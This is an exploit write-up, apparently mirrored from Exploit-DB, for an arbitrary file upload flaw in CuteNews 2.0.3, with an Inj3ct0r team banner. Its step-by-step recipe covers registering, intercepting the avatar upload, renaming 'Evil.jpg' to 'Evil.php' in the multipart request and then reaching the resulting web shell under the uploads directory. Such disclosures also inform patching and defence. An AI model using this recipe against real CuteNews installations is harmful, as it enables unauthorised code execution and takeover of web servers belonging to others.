CuteNews 2.0.3 – Arbitrary File Upload - 体验盒子

作者： T0x!c
日期： 2015-07-03
类别：
webapps
平台：
php
来源：https://www.exploit-db.com/exploits/37474/
CuteNews 2.0.3 Remote File Upload Vulnerability
=================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \__/'__`\/\ \__/'__`\ 0
0/\_, \___ /\_\/\_\ \ \___\ \ ,_\/\ \/\ \_ ___ 1
1\/_/\ \ /' _ `\ \/\ \/_/_\_<_/'___\ \ \/\ \ \ \ \/\`'__\0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/\/____/ \/__/ \/___/\/_/ 1
1\ \____/ >> Exploit database separated by exploit 0
0 \/___/type (local, remote, DoS, etc.)1
11
0[+] Site: Inj3ct0r.com0
1[+] Support e-mail: submit[at]inj3ct0r.com1
00
1 ########################################## 1
0 I'm T0x!c member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1



# Exploit Title: CuteNews 2.0.3 Remote File Upload Vulnerability
# Date: [02/07/2015]
# Exploit Author: [T0x!c]
# Facebook: https://www.facebook.com/Dz.pr0s
# Vendor Homepage: [http://cutephp.com/]
# Software Link: [http://cutephp.com/cutenews/cutenews.2.0.3.zip]
# Version: [2.0.3] 
# Tested on: [Windows 7]
# greetz to :Tr00n , Kha&mix , Cc0de, Ghosty , Ked ans , Caddy-dz .....
==========================================================
 # Exploit:
 
Vuln : http://127.0.0.1/cutenews/index.php?mod=main&opt=personal

 1 - Sign up for New User
 2 - Log In 
 3 - Go to Personal options http://www.target.com/cutenews/index.php?mod=main&opt=personal
 4 - Select Upload Avatar Example: Evil.jpg
 5 - use tamper data& Rename File Evil.jpg to Evil.php

-----------------------------2847913122899\r\nContent-Disposition: form-data; name="avatar_file"; filename="Evil.php"\r\

6 - Your Shell : http://127.0.0.1/cutenews/uploads/avatar_Username_FileName.php

 Example: http://127.0.0.1/cutenews/uploads/avatar_toxic_Evil.php